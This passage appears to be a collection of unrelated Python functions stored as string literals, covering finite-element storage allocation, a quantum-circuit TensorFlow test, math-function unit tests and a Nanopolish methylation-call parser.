thing for the element boundary quadrature\n #\n (self.elementBoundaryQuadraturePoints,\n self.elementBoundaryQuadratureWeights,\n self.elementBoundaryQuadratureRuleIndeces) = Quadrature.buildUnion(elementBoundaryQuadratureDict)\n self.nElementBoundaryQuadraturePoints_elementBoundary = self.elementBoundaryQuadraturePoints.shape[0]\n self.nElementBoundaryQuadraturePoints_global = (self.mesh.nElements_global*\n self.mesh.nElementBoundaries_element*\n self.nElementBoundaryQuadraturePoints_elementBoundary)\n\n #\n #storage dictionaries\n self.scalars_element = set()\n #\n #simplified allocations for test==trial and also check if space is mixed or not\n #\n self.q={}\n self.ebq={}\n self.ebq_global={}\n self.ebqe={}\n self.phi_ip={}\n #mesh\n self.q['x'] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,3),'d')\n self.q['det(J)'] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n self.q['abs(det(J))'] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n self.q['J'] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,self.nSpace_global,self.nSpace_global),'d')\n self.q['inverse(J)'] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,self.nSpace_global,self.nSpace_global),'d')\n self.ebqe['x'] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary,3),'d')\n self.ebqe['g'] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n max(1,self.nSpace_global-1),\n max(1,self.nSpace_global-1)),\n 'd')\n self.ebqe['inverse(J)'] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary,self.nSpace_global,self.nSpace_global),'d')\n self.ebqe['hat(x)'] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary,3),'d')\n self.ebqe['bar(x)'] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary,3),'d')\n self.ebqe['sqrt(det(g))'] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary),'d')\n self.ebqe[('n')] = 
numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary,self.nSpace_global),'d')\n #shape\n self.q[('v',0)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,self.nDOF_trial_element[0]),'d')\n self.q[('w',0)] = self.q[('v',0)]\n self.q[('grad(v)',0)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,self.nDOF_trial_element[0],self.nSpace_global),'d')\n self.q[('grad(w)',0)] = self.q[('grad(v)',0)]\n self.q[('grad(w)*dV',0)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,self.nDOF_trial_element[0],self.nSpace_global),'d')\n self.q[('grad(w)*dV_f',0)] = self.q[('grad(w)*dV',0)]\n #todo get rid of dV_{f,a}, etc\n self.q[('w*dV',0)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,self.nDOF_trial_element[0]),'d')\n self.q[('w*dV_m',0)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,self.nDOF_trial_element[0]),'d')\n #assume all components are the same space for now\n shapeKeysForAlias = ['v','w','grad(v)','grad(w)*dV','grad(w)*dV_f','w*dV','w*dV_m']\n for ci in range(1,self.nc):\n for key in shapeKeysForAlias:\n key_ci = (key,ci)\n key_0 = (key,0)\n self.q[key_ci] = self.q[key_0]\n #ELLAM weights stiffness, body integrals by dt\n for ci in range(self.nc):\n self.q[('dt*grad(w)*dV',ci)]= numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,self.nDOF_trial_element[ci],self.nSpace_global),'d')\n #\n self.ebqe[('v',0)] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary,self.nDOF_trial_element[0]),'d')\n self.ebqe[('w',0)] = self.ebqe[('v',0)]\n self.ebqe[('grad(v)',0)] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary,self.nDOF_trial_element[0],self.nSpace_global),'d')\n self.ebqe[('w*dS_f',0)] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary,self.nDOF_trial_element[0]),'d')\n #assume all components are the same space for now\n shapeKeysForAlias = ['v','w','grad(v)','w*dS_f']\n for ci in range(1,self.nc):\n for key in shapeKeysForAlias:\n key_ci = (key,ci)\n key_0 = (key,0)\n self.ebqe[key_ci] = self.ebqe[key_0]\n\n for ci in range(self.nc):\n self.q[('u',ci)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n self.q[('grad(u)',ci)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,self.nSpace_global),'d')\n #f\n for ci in self.coefficients.advection.keys():\n self.q[('f',ci)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,self.nSpace_global),'d')\n for cj in self.coefficients.advection[ci].keys():\n self.q[('df',ci,cj)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,self.nSpace_global),'d')\n self.ebqe[('f',ci)] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary,self.nSpace_global),'d')\n for cj in self.coefficients.advection[ci].keys():\n self.ebqe[('df',ci,cj)] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary,self.nSpace_global),'d')\n\n #a, linear dispersion single component\n\n for ci,ckDict in self.coefficients.diffusion.iteritems():\n for ck,cjDict in ckDict.iteritems():\n for flag in cjDict.values():\n assert flag == 'constant', \"Error potential %s LADRellam does not handle diffusion = 
%s yet\" % (ck,flag)\n\n if self.coefficients.sdInfo != None and (ci,ck) in self.coefficients.sdInfo.keys():\n self.q[('a',ci,ck)] = numpy.zeros(\n (self.mesh.nElements_global,\n self.nQuadraturePoints_element,\n self.coefficients.sdInfo[(ci,ck)][0][self.nSpace_global]),\n 'd')\n for cj in cjDict.keys():\n self.q[('da',ci,ck,cj)] = numpy.zeros(\n (self.mesh.nElements_global,\n self.nQuadraturePoints_element,\n self.coefficients.sdInfo[(ci,ck)][0][self.nSpace_global]),\n 'd')\n self.ebqe[('a',ci,ck)]=numpy.zeros(\n (self.mesh.nExteriorElementBoundaries_global,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n self.coefficients.sdInfo[(ci,ck)][0][self.nSpace_global]),\n 'd')\n for cj in cjDict.keys():\n self.ebqe[('da',ci,ck,cj)]=numpy.zeros(\n (self.mesh.nExteriorElementBoundaries_global,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n self.coefficients.sdInfo[(ci,ck)][0][self.nSpace_global]),\n 'd')\n\n else:\n self.q[('a',ci,ck)]=numpy.zeros(\n (self.mesh.nElements_global,\n self.nQuadraturePoints_element,\n self.nSpace_global,\n self.nSpace_global),\n 'd')\n for cj in cjDict.keys():\n self.q[('da',ci,ck,cj)]=numpy.zeros(\n (self.mesh.nElements_global,\n self.nQuadraturePoints_element,\n self.nSpace_global,\n self.nSpace_global),\n 'd')\n self.ebqe[('a',ci,ck)]=numpy.zeros(\n (self.mesh.nExteriorElementBoundaries_global,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n self.nSpace_global,\n self.nSpace_global),\n 'd')\n for cj in cjDict.keys():\n self.ebqe[('da',ci,ck,cj)]=numpy.zeros(\n (self.mesh.nExteriorElementBoundaries_global,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n self.nSpace_global,\n self.nSpace_global),\n 'd')\n #dense storage\n self.q[('grad(w)*dV_a',ci,ck)] = self.q[('grad(w)*dV_f',ci)]\n self.q[('dt*grad(w)*dV_a',ci,ck)]= self.q[('dt*grad(w)*dV',ci)]\n #ci,ckDict\n #linear potential only for now, need to change for e.g., Buckley Leverett\n for ck in self.phi.keys():\n self.phi[ck].dof[:]=self.u[ck].dof\n self.q[('grad(phi)',ck)] = self.q[('grad(u)',ck)]\n for key in self.dphi.keys():\n self.dphi[key].dof.fill(1.0)\n self.q[('dphi',key[0],key[1])] = numpy.ones((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n\n\n\n# if self.coefficients.diffusion.has_key(0):\n# for ck,flag in self.coefficients.diffusion[0][0].iteritems():\n# assert self.coefficients.diffusion[0][0][ck] == 'constant', \"Error potential %s LADRellam does not handle diffusion = %s yet\" % (ck,flag)\n# if self.coefficients.sdInfo != None and (0,0) in self.coefficients.sdInfo.keys():\n# self.q[('a',0,0)] = numpy.zeros(\n# (self.mesh.nElements_global,\n# self.nQuadraturePoints_element,\n# self.coefficients.sdInfo[(0,0)][0][self.nSpace_global]),\n# 'd')\n# self.q[('da',0,0,0)] = numpy.zeros(\n# (self.mesh.nElements_global,\n# self.nQuadraturePoints_element,\n# self.coefficients.sdInfo[(0,0)][0][self.nSpace_global]),\n# 'd')\n# self.ebqe[('a',0,0)]=numpy.zeros(\n# (self.mesh.nExteriorElementBoundaries_global,\n# self.nElementBoundaryQuadraturePoints_elementBoundary,\n# self.coefficients.sdInfo[(0,0)][0][self.nSpace_global]),\n# 'd')\n# self.ebqe[('da',0,0,0)]=numpy.zeros(\n# (self.mesh.nExteriorElementBoundaries_global,\n# self.nElementBoundaryQuadraturePoints_elementBoundary,\n# self.coefficients.sdInfo[(0,0)][0][self.nSpace_global]),\n# 'd')\n\n# else:\n# self.q[('a',0,0)]=numpy.zeros(\n# (self.mesh.nElements_global,\n# self.nQuadraturePoints_element,\n# self.nSpace_global,\n# self.nSpace_global),\n# 'd')\n# self.q[('da',0,0,0)]=numpy.zeros(\n# 
(self.mesh.nElements_global,\n# self.nQuadraturePoints_element,\n# self.nSpace_global,\n# self.nSpace_global),\n# 'd')\n# self.ebqe[('a',0,0)]=numpy.zeros(\n# (self.mesh.nExteriorElementBoundaries_global,\n# self.nElementBoundaryQuadraturePoints_elementBoundary,\n# self.nSpace_global,\n# self.nSpace_global),\n# 'd')\n# self.ebqe[('da',0,0,0)]=numpy.zeros(\n# (self.mesh.nExteriorElementBoundaries_global,\n# self.nElementBoundaryQuadraturePoints_elementBoundary,\n# self.nSpace_global,\n# self.nSpace_global),\n# 'd')\n# #\n# self.phi[0].dof[:]=self.u[0].dof\n# self.dphi[(0,0)].dof.fill(1.0)\n# self.q[('grad(phi)',0)] = self.q[('grad(u)',0)]\n# self.q[('dphi',0,0)] = numpy.ones((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n\n# self.q[('grad(w)*dV_a',0,0)] = self.q[('grad(w)*dV_f',0)]\n# self.q[('dt*grad(w)*dV_a',0,0)]= self.q[('dt*grad(w)*dV',0)]\n\n #r 'constant' ie not a function of solution but go ahead and include dr for now\n for ci,cjDict in self.coefficients.reaction.iteritems():\n self.q[('r',ci)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n for cj in cjDict.keys():\n self.q[('dr',ci,cj)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n self.q[('w*dV_r',ci)] = self.q[('w*dV',ci)]\n self.q[('dt*w*dV_r',ci)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,self.nDOF_trial_element[0]),'d')\n self.ebqe[('r',ci)] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary),'d')\n\n #m\n for ci,cjDict in self.coefficients.mass.iteritems():\n self.q[('m',ci)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n for cj in cjDict.keys():\n self.q[('dm',ci,cj)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n self.q[('mt',ci)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n self.q[('m_last',ci)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n self.q[('m_tmp',ci)] = self.q[('m',ci)]\n self.q[('cfl',ci)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n self.q[('numDiff',ci,ci)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n self.ebqe[('m',ci)] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary),'d')\n for cj in cjDict.keys():\n self.ebqe[('dm',ci,cj)] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary),'d')\n\n\n ###ellam specific options with defauls here\n self.ellamDiscretization = ELLAMtools.ELLAMdiscretization(self,options)\n\n #\n self.needEBQ = options.needEBQ #could need for analytical velocity evaluation with RT0,BDM\n\n #beg normal stuff allocating things\n self.points_elementBoundaryQuadrature= set()\n self.scalars_elementBoundaryQuadrature= set([('u',ci) for ci in range(self.nc)])\n self.vectors_elementBoundaryQuadrature= set()\n self.tensors_elementBoundaryQuadrature= set()\n\n if self.needEBQ:\n for k in ['x','hat(x)']:\n self.ebq[k] = numpy.zeros((self.mesh.nElements_global,\n self.mesh.nElementBoundaries_element,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n 3),'d')\n self.ebq['n'] = numpy.zeros((self.mesh.nElements_global,\n self.mesh.nElementBoundaries_element,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n self.nSpace_global),'d')\n self.ebq['inverse(J)'] = 
numpy.zeros((self.mesh.nElements_global,\n self.mesh.nElementBoundaries_element,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n self.nSpace_global,\n self.nSpace_global),'d')\n #allocate the metric tensor\n self.ebq['g'] = numpy.zeros((self.mesh.nElements_global,\n self.mesh.nElementBoundaries_element,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n max(1,self.nSpace_global-1),\n max(1,self.nSpace_global-1)),\n 'd')\n log(memory(\"element boundary quadrature\",\"LADRellam\"),level=4)\n ebq_keys = ['sqrt(det(g))']\n ebq_keys.extend([('u',ci) for ci in range(self.nc)])\n for k in ebq_keys:\n self.ebq[k] = numpy.zeros((self.mesh.nElements_global,\n self.mesh.nElementBoundaries_element,\n self.nElementBoundaryQuadraturePoints_elementBoundary),'d')\n\n #test and trial info\n self.ebq[('w',0)] = numpy.zeros((self.mesh.nElements_global,\n self.mesh.nElementBoundaries_element,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n self.nDOF_trial_element[0]),'d')\n for ci in range(1,self.nc):\n self.ebq[('w',ci)] = self.ebq[('w',0)]\n for ci in range(self.nc):\n self.ebq[('v',ci)] = self.ebq[('w',0)]\n\n #ebq_global info\n self.ebq_global['x'] = numpy.zeros((self.mesh.nElementBoundaries_global,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n 3),'d')\n self.ebq_global['n'] = numpy.zeros((self.mesh.nElementBoundaries_global,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n self.nSpace_global),'d')\n #\n # allocate residual and Jacobian storage\n #\n self.elementResidual = [numpy.zeros(\n (self.mesh.nElements_global,\n self.nDOF_test_element[ci]),\n 'd') for ci in range(self.nc)]\n self.elementSpatialResidual = [numpy.zeros(\n (self.mesh.nElements_global,\n self.nDOF_test_element[ci]),\n 'd') for ci in range(self.nc)]\n self.elementJacobian = {}\n for ci in range(self.nc):\n self.elementJacobian[ci]={}\n for cj in range(self.nc):\n if cj in self.coefficients.stencil[ci]:\n self.elementJacobian[ci][cj] = numpy.zeros(\n (self.mesh.nElements_global,\n self.nDOF_test_element[ci],\n self.nDOF_trial_element[cj]),\n 'd')\n #\n self.fluxJacobian_exterior = {}\n for ci in range(self.nc):\n self.fluxJacobian_exterior[ci]={}\n for cj in self.coefficients.stencil[ci]:\n self.fluxJacobian_exterior[ci][cj] = numpy.zeros(\n (self.mesh.nExteriorElementBoundaries_global,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n self.nDOF_trial_element[cj]),\n 'd')\n\n #\n #\n #\n #\n log(memory(\"element and element boundary Jacobians\",\"OneLevelTransport\"),level=4)\n self.inflowBoundaryBC = {}\n self.inflowBoundaryBC_values = {}\n self.inflowFlux = {}\n for cj in range(self.nc):\n self.inflowBoundaryBC[cj] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,),'i')\n self.inflowBoundaryBC_values[cj] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nDOF_trial_element[cj]),'d')\n self.inflowFlux[cj] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary),'d')\n self.internalNodes = set(range(self.mesh.nNodes_global))\n #identify the internal nodes this is ought to be in mesh\n ##\\todo move this to mesh\n for ebNE in range(self.mesh.nExteriorElementBoundaries_global):\n ebN = self.mesh.exteriorElementBoundariesArray[ebNE]\n eN_global = self.mesh.elementBoundaryElementsArray[ebN,0]\n ebN_element = self.mesh.elementBoundaryLocalElementBoundariesArray[ebN,0]\n for i in range(self.mesh.nNodes_element):\n if i != ebN_element:\n I = self.mesh.elementNodesArray[eN_global,i]\n self.internalNodes -= 
set([I])\n self.nNodes_internal = len(self.internalNodes)\n self.internalNodesArray=numpy.zeros((self.nNodes_internal,),'i')\n for nI,n in enumerate(self.internalNodes):\n self.internalNodesArray[nI]=n\n #\n del self.internalNodes\n self.internalNodes = None\n log(\"Updating local to global mappings\",2)\n self.updateLocal2Global()\n log(\"Building time integration object\",2)\n log(memory(\"inflowBC, internalNodes,updateLocal2Global\",\"OneLevelTransport\"),level=4)\n #mwf for interpolating subgrid error for gradients etc\n if self.stabilization and self.stabilization.usesGradientStabilization:\n self.timeIntegration = TimeIntegrationClass(self,integrateInterpolationPoints=True)\n else:\n self.timeIntegration = TimeIntegrationClass(self)\n\n if options != None:\n self.timeIntegration.setFromOptions(options)\n log(memory(\"TimeIntegration\",\"OneLevelTransport\"),level=4)\n log(\"Calculating numerical quadrature formulas\",2)\n self.calculateQuadrature()\n #lay out components/equations contiguously for now\n self.offset = [0]\n for ci in range(1,self.nc):\n self.offset += [self.offset[ci-1]+self.nFreeDOF_global[ci-1]]\n self.stride = [1 for ci in range(self.nc)]\n #use contiguous layout of components for parallel, requires weak DBC's\n comm = Comm.get()\n self.comm=comm\n if comm.size() > 1:\n assert numericalFluxType != None and numericalFluxType.useWeakDirichletConditions,\"You must use a numerical flux to apply weak boundary conditions for parallel runs\"\n self.offset = [0]\n for ci in range(1,self.nc):\n self.offset += [ci]\n self.stride = [self.nc for ci in range(self.nc)]\n #\n log(memory(\"stride+offset\",\"OneLevelTransport\"),level=4)\n if numericalFluxType != None:\n if options == None or options.periodicDirichletConditions == None:\n self.numericalFlux = numericalFluxType(self,\n dofBoundaryConditionsSetterDict,\n advectiveFluxBoundaryConditionsSetterDict,\n diffusiveFluxBoundaryConditionsSetterDictDict)\n else:\n self.numericalFlux = numericalFluxType(self,\n dofBoundaryConditionsSetterDict,\n advectiveFluxBoundaryConditionsSetterDict,\n diffusiveFluxBoundaryConditionsSetterDictDict,\n options.periodicDirichletConditions)\n else:\n self.numericalFlux = None\n #set penalty terms\n #cek todo move into numerical flux initialization\n if self.ebq_global.has_key('penalty'):\n for ebN in range(self.mesh.nElementBoundaries_global):\n for k in range(self.nElementBoundaryQuadraturePoints_elementBoundary):\n self.ebq_global['penalty'][ebN,k] = self.numericalFlux.penalty_constant/(self.mesh.elementBoundaryDiametersArray[ebN]**self.numericalFlux.penalty_power)\n #penalty term\n #cek move to Numerical flux initialization\n if self.ebqe.has_key('penalty'):\n for ebNE in range(self.mesh.nExteriorElementBoundaries_global):\n ebN = self.mesh.exteriorElementBoundariesArray[ebNE]\n for k in range(self.nElementBoundaryQuadraturePoints_elementBoundary):\n self.ebqe['penalty'][ebNE,k] = self.numericalFlux.penalty_constant/self.mesh.elementBoundaryDiametersArray[ebN]**self.numericalFlux.penalty_power\n log(memory(\"numericalFlux\",\"OneLevelTransport\"),level=4)\n self.elementEffectiveDiametersArray = self.mesh.elementInnerDiametersArray\n #use post processing tools to get conservative fluxes, None by default\n import PostProcessingTools\n self.velocityPostProcessor = PostProcessingTools.VelocityPostProcessingChooser(self)\n log(memory(\"velocity postprocessor\",\"OneLevelTransport\"),level=4)\n #helper for writing out data storage\n import Archiver\n self.elementQuadratureDictionaryWriter = 
Archiver.XdmfWriter()\n self.elementBoundaryQuadratureDictionaryWriter = Archiver.XdmfWriter()\n self.exteriorElementBoundaryQuadratureDictionaryWriter = Archiver.XdmfWriter()\n #TODO get rid of this\n for ci,fbcObject in self.fluxBoundaryConditionsObjectsDict.iteritems():\n self.ebqe[('advectiveFlux_bc_flag',ci)] = numpy.zeros(self.ebqe[('advectiveFlux_bc',ci)].shape,'i')\n for t,g in fbcObject.advectiveFluxBoundaryConditionsDict.iteritems():\n if self.coefficients.advection.has_key(ci):\n self.ebqe[('advectiveFlux_bc',ci)][t[0],t[1]] = g(self.ebqe[('x')][t[0],t[1]],self.timeIntegration.t)\n self.ebqe[('advectiveFlux_bc_flag',ci)][t[0],t[1]] = 1\n\n if hasattr(self.numericalFlux,'setDirichletValues'):\n self.numericalFlux.setDirichletValues(self.ebqe)\n if not hasattr(self.numericalFlux,'isDOFBoundary'):\n self.numericalFlux.isDOFBoundary = {}\n for ci in range(self.nc):\n self.numericalFlux.isDOFBoundary[ci]= numpy.zeros(self.ebqe[('u',ci)].shape,'i')\n if not hasattr(self.numericalFlux,'ebqe'):\n self.numericalFlux.ebqe = {}\n for ci in range(self.nc):\n self.numericalFlux.ebqe[('u',ci)]= numpy.zeros(self.ebqe[('u',ci)].shape,'d')", "def test_coefficients_tf_interface(self):\n import tensorflow as tf\n\n qnode = qml.QNode(self.circuit, self.dev)\n\n weights = tf.Variable([0.5, 0.2])\n\n obtained_result = coefficients(partial(qnode, weights), 2, 1)\n\n assert np.allclose(obtained_result, self.expected_result)", "def __call__(self, x):\n\n self.dbeads.q = x\n e = self.dforces.pot # Energy\n g = -self.dforces.f # Gradient\n\n return e, g", "def test_functions(self):\n\n # exp\n\n e_ref = 2.71828182845904523536028747135281\n ee_ref = 15.1542622414792641897604302726327\n\n self.assertTrue(isclose(\n common_math.exp(0),\n 1\n ))\n self.assertTrue(isclose(\n common_math.exp(1),\n e_ref\n ))\n self.assertTrue(isclose(\n common_math.exp(e_ref),\n ee_ref\n ))\n\n # sqrt\n \n s2_ref = 1.41421356237309504880168872420977\n s3_ref = 1.73205080756887729352744634150584\n e2_ref = 7.3890560989306502272304274605753\n ef2_ref = 1.6487212707001281468486507878142\n\n self.assertTrue(isclose(\n common_math.sqrt(0),\n 0\n ))\n self.assertTrue(isclose(\n common_math.sqrt(1),\n 1\n ))\n self.assertTrue(isclose(\n common_math.sqrt(4),\n 2\n ))\n self.assertTrue(isclose(\n common_math.sqrt(2),\n s2_ref\n ))\n self.assertTrue(isclose(\n common_math.sqrt(3),\n s3_ref\n ))\n self.assertTrue(isclose(\n common_math.sqrt(e2_ref),\n e_ref\n ))\n self.assertTrue(isclose(\n common_math.sqrt(e_ref),\n ef2_ref\n ))\n\n # cbrt\n \n e3_ref = 20.0855369231876677409285296545811\n ef3_ref = 1.39561242508608952862812531960265\n\n self.assertTrue(isclose(\n common_math.cbrt(0),\n 0\n ))\n self.assertTrue(isclose(\n common_math.cbrt(1),\n 1\n ))\n self.assertTrue(isclose(\n common_math.cbrt(-1),\n -1\n ))\n self.assertTrue(isclose(\n common_math.cbrt(8),\n 2\n ))\n self.assertTrue(isclose(\n common_math.cbrt(-0.125),\n -0.5\n ))\n self.assertTrue(isclose(\n common_math.cbrt(e3_ref),\n e_ref\n ))\n self.assertTrue(isclose(\n common_math.cbrt(e_ref),\n ef3_ref\n ))\n\n # hypot\n\n self.assertTrue(isclose(\n common_math.hypot(0, 0),\n 0\n ))\n self.assertTrue(isclose(\n common_math.hypot(1, 0),\n 1\n ))\n self.assertTrue(isclose(\n common_math.hypot(1, 1),\n s2_ref\n ))\n self.assertTrue(isclose(\n common_math.hypot(1, s2_ref),\n s3_ref\n ))\n self.assertTrue(isclose(\n common_math.hypot(1, s3_ref),\n 2\n ))\n self.assertTrue(isclose(\n common_math.hypot(s3_ref, 1),\n 2\n ))\n\n # asinh\n\n sh1_ref = 
1.17520119364380145688238185059568\n she_ref = 7.54413710281697582634182004251749\n\n self.assertTrue(isclose(\n common_math.asinh(0),\n 0\n ))\n self.assertTrue(isclose(\n common_math.asinh(sh1_ref),\n 1\n ))\n self.assertTrue(isclose(\n common_math.asinh(-sh1_ref),\n -1\n ))\n self.assertTrue(isclose(\n common_math.asinh(she_ref),\n e_ref\n ))\n\n # cosh\n\n ch1_ref = 1.54308063481524377847790562075713\n che_ref = 7.61012513866228836341861023011441\n\n self.assertTrue(isclose(\n common_math.acosh(1),\n 0\n ))\n self.assertTrue(isclose(\n common_math.acosh(ch1_ref),\n 1\n ))\n self.assertTrue(isclose(\n common_math.acosh(che_ref),\n e_ref\n ))\n\n # re\n\n self.assertTrue(common_math.re(0) == 0)\n self.assertTrue(common_math.re(1) == 1)\n self.assertTrue(common_math.re(e_ref) == e_ref)\n self.assertTrue(common_math.re(2j**2) == -4)\n self.assertTrue(common_math.re(3+4j) == 3)", "def __init__ (self,\n input_fn:\"str\",\n fasta_index:\"str\"=\"\",\n output_bed_fn:\"str\"=\"\",\n output_tsv_fn:\"str\"=\"\",\n min_depth:\"int\"=10,\n sample_id:\"str\"=\"\",\n strand_specific:\"bool\"=False,\n min_llr:\"float\"=2,\n verbose:\"bool\"=False,\n quiet:\"bool\"=False):\n\n # Save init options in dict for later\n kwargs = locals()\n\n # Define overall verbose level\n log = get_logger(name=\"Freq_meth_calculate\", verbose=verbose, quiet=quiet)\n\n # Print option summary log\n log.debug (\"## Options summary ##\")\n log.debug (\"\\tpackage_name: {}\".format(package_name))\n log.debug (\"\\tpackage_version: {}\".format(package_version))\n log.debug (\"\\ttimestamp: {}\".format(str(datetime.datetime.now())))\n log.debug (dict_to_str(kwargs, nsep=1, exclude_list=[\"self\"]))\n\n # Verify parameters validity\n log.warning (\"## Checking arguments ##\")\n\n # Try to read input file if not a stream\n log.debug(\"\\tTesting input file readability\")\n if input_fn != 0 and not file_readable (input_fn):\n raise IOError (\"Cannot read input file\")\n\n # Verify that at least one output file is given:\n log.debug(\"\\tCheck output file\")\n if not output_bed_fn and not output_tsv_fn:\n raise NanopolishCompError(\"At least one output file should be given\")\n if output_bed_fn:\n if os.path.dirname(output_bed_fn):\n mkdir (os.path.dirname(output_bed_fn), exist_ok=True)\n log.debug(\"\\t\\tOutput results in bed format\")\n if output_tsv_fn:\n if os.path.dirname(output_tsv_fn):\n mkdir (os.path.dirname(output_tsv_fn), exist_ok=True)\n log.debug(\"\\t\\tOutput results in tsv format\")\n\n # Create self variables\n counter = Counter()\n\n log.warning (\"## Parsing methylation_calls file ##\")\n # Init SGC class with fasta_index\n if fasta_index:\n SGC.set_chrom_list(fasta_index)\n\n # Create collection to store results\n site_dict = defaultdict(list)\n\n try:\n input_fp = open (input_fn, \"r\")\n\n log.info (\"\\tStarting to parse file Nanopolish methylation call file\")\n header_line = input_fp.readline()\n byte_offset = len(header_line)\n lp = LineParser(header_line, sep=\"\\t\", cast_numeric_field=True)\n\n for line in tqdm(input_fp, desc=\"\\t\", unit=\" lines\", disable=log.level>=30):\n counter[\"Total read lines\"]+=1\n byte_len = len(line)\n l = lp(line)\n \n if not l:\n # Failsafe if line is malformed\n counter[\"Invalid read line\"]+=1\n else:\n # Store byte offset corresponding to appropriate line\n counter[\"Valid read lines\"]+=1\n if strand_specific:\n coord = SGC(l.chromosome, l.start, l.strand)\n else:\n coord = SGC(l.chromosome, l.start)\n site_dict[coord].append(byte_offset)\n byte_offset += 
byte_len\n\n log.info (\"\\tFiltering out low coverage sites\")\n filtered_site_dict = defaultdict(list)\n for k, offset_list in site_dict.items():\n counter[\"Total sites\"]+=1\n\n # If low coverage unset list to release memory\n if len(offset_list) < min_depth:\n counter[\"Low coverage sites\"]+=1\n else:\n counter[\"Valid sites\"]+=1\n filtered_site_dict[k]=offset_list\n del site_dict\n\n if not filtered_site_dict:\n raise NanopolishCompError (\"No valid sites left after coverage filtering\")\n\n if fasta_index:\n log.info (\"\\tSorting by coordinates\")\n filtered_site_dict = OrderedDict(sorted(filtered_site_dict.items(), key=lambda t: t[0]))\n\n log.info (\"\\tProcessing valid sites found\")\n Site.set_class_param(strand_specific=strand_specific, min_llr=min_llr)\n\n log.debug (\"\\t\\tWrite output file header\")\n if output_bed_fn:\n output_bed_fp = open (output_bed_fn, \"w\")\n output_bed_fp.write(Site.BED_header(sample_id)+\"\\n\")\n if output_tsv_fn:\n output_tsv_fp = open (output_tsv_fn, \"w\")\n output_tsv_fp.write(Site.TSV_header()+\"\\n\")\n\n for k, offset_list in tqdm(filtered_site_dict.items(), desc=\"\\t\", unit=\" sites\", disable=log.level>=30):\n # Get all read lines corresponding to current site\n ll = []\n for offset in offset_list:\n input_fp.seek(offset, 0)\n ll.append(lp(input_fp.readline()))\n\n # Parse list with helper class Site\n site = Site(ll=ll, id=hash(k))\n counter[\"Valid sites\"]+=1\n if output_bed_fn:\n output_bed_fp.write(site.to_bed()+\"\\n\")\n if output_tsv_fn:\n output_tsv_fp.write(site.to_tsv()+\"\\n\")\n finally:\n input_fp.close()\n if output_bed_fn:\n output_bed_fp.close()\n if output_tsv_fn:\n output_tsv_fp.close()\n\n log.info (\"## Results summary ##\")\n log.info (dict_to_str(counter, 